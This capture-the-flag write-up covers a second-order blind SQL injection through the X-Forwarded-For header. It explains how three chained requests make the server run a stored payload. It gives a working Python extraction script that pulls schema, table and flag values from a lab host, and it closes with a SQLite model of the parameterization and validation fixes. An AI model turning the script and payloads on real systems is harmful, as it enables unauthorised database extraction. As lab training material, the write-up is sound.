Challenge
Key points
- X-Forwarded-For injection
- Second-order injection
- Blind injection
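After reading the write-up, I learned that the injection point is the X-Forwarded-For header, and that it is a second-order injection.
The output is echoed here
For the first request we send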
<pre>1' or '1</pre>
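For the second and third requests we send the same value, for example 111.
Because the first input (1' or '1) differs from the second input (111), the page echoes the first one back.
At this point 1' or '1 is already stored in the database. Since 111 differs from 1' or '1, the server does not look up 1' or '1 in the database; it simply displays the previous IP.
When we send 111 again (the third request), it matches the 111 sent before, which simulates an IP that no longer changes. The server now has to query the database for the last IP of 111, and in doing so it executes 1' or '1.
Here is the code. Note that the flag is not in the current database.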
<pre>
# coding:utf-8
import requests
import time

url = 'http://node3.buuoj.cn:25869/'
res = ''
for i in range(1, 200):
    print(i)
    # Binary search over the ASCII code of the i-th character
    left = 31
    right = 127
    mid = left + ((right - left) >> 1)
    while left < right:
        #payload = "0' or (ascii(substr((select group_concat(schema_name) from information_schema.schemata),{},1))>{}) or '0".format(i,mid)
        #payload = "0' or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = 'F4l9_D4t4B45e'),{},1))>{}) or '0".format(i,mid)
        #payload = "0' or (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'F4l9_t4b1e'),{},1))>{}) or '0".format(i,mid)
        payload = "0' or (ascii(substr((select group_concat(F4l9_C01uMn) from F4l9_D4t4B45e.F4l9_t4b1e),{},1))>{}) or '0".format(i,mid)
        # Request 1: the payload is stored as the current IP
        headers = {
            'Cookie': 'track_uuid=6e17fe5e-140c-4138-dea6-d197aa6214e3',
            'X-Forwarded-For': payload
        }
        r = requests.post(url = url, headers = headers)
        # Request 2: a different value, so the payload becomes the last IP
        payload = '111'
        headers = {
            'Cookie': 'track_uuid=6e17fe5e-140c-4138-dea6-d197aa6214e3',
            'X-Forwarded-For': payload
        }
        r = requests.post(url = url, headers = headers)
        # Request 3: the same value again, so the server queries the stored last IP
        payload = '111'
        headers = {
            'Cookie': 'track_uuid=6e17fe5e-140c-4138-dea6-d197aa6214e3',
            'X-Forwarded-For': payload
        }
        r = requests.post(url = url, headers = headers)
        if r.status_code == 429:
            # Rate limited: wait and repeat this comparison with the same mid
            print('too fast')
            time.sleep(2)
            continue
        if 'Last Ip: 1' in r.text:
            left = mid + 1
        else:
            right = mid
        mid = left + ((right-left)>>1)
    # No character at this position: the result string has ended
    if mid == 31 or mid == 127:
        break
    res += chr(mid)
    print(str(mid),res)
    time.sleep(1)
# information_schema,ctftraining,mysql,performance_schema,test,ctf,F4l9_D4t4B45e
#F4l9_t4b1e
#F4l9_C01uMn
</pre>
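The three-request sequence described above, modeled from the server's side as an added example (not the challenge's source code and not from the original write-up). The `track` table, the `handle` and `replay` functions, and the concatenated `SELECT` that stands in for the server's unknown lookup are all assumptions, with SQLite standing in for the database; it shows why binding the stored value when it is read back, or rejecting a header that is not an IP literal, stops the stored string from being evaluated.

```python
import ipaddress
import sqlite3

def handle(conn, uuid, xff, parameterize=False, validate=False):
    """Process one request and return the text shown after 'Last Ip:'."""
    if validate:
        # Hardening 1: accept the header only if it parses as an IP literal.
        try:
            xff = str(ipaddress.ip_address(xff))
        except ValueError:
            return "rejected"
    row = conn.execute("SELECT ip, last_ip FROM track WHERE uuid = ?",
                       (uuid,)).fetchone()
    if row is None:
        # First visit: the write is parameterized, so the raw value is stored intact.
        conn.execute("INSERT INTO track VALUES (?, ?, ?)", (uuid, xff, xff))
        return xff
    ip, last_ip = row
    if xff != ip:
        # IP changed: the old value becomes last_ip and is echoed without a query.
        conn.execute("UPDATE track SET ip = ?, last_ip = ? WHERE uuid = ?",
                     (xff, ip, uuid))
        return ip
    if parameterize:
        # Hardening 2: the stored value is bound as data on the way back in.
        shown = conn.execute("SELECT ?", (last_ip,)).fetchone()[0]
    else:
        # Vulnerable (assumed model): the stored value is concatenated into SQL.
        shown = conn.execute("SELECT '" + last_ip + "'").fetchone()[0]
    return str(shown)

def replay(values, **hardening):
    """Send the header values in order within one session; return each display."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE track (uuid TEXT PRIMARY KEY, ip TEXT, last_ip TEXT)")
    # "constructed-uuid" is a made-up session identifier for this example.
    return [handle(conn, "constructed-uuid", v, **hardening) for v in values]

if __name__ == "__main__":
    seq = ["1' or '1", "111", "111"]  # the three inputs from the write-up
    print(replay(seq))                     # third display is the evaluated expression
    print(replay(seq, parameterize=True))  # third display is the stored string itself
    print(replay(seq, validate=True))      # nothing that is not an IP is stored
```

The write path here is already parameterized, which is the point of a second-order injection: the value is stored safely and only becomes SQL when a later query trusts it.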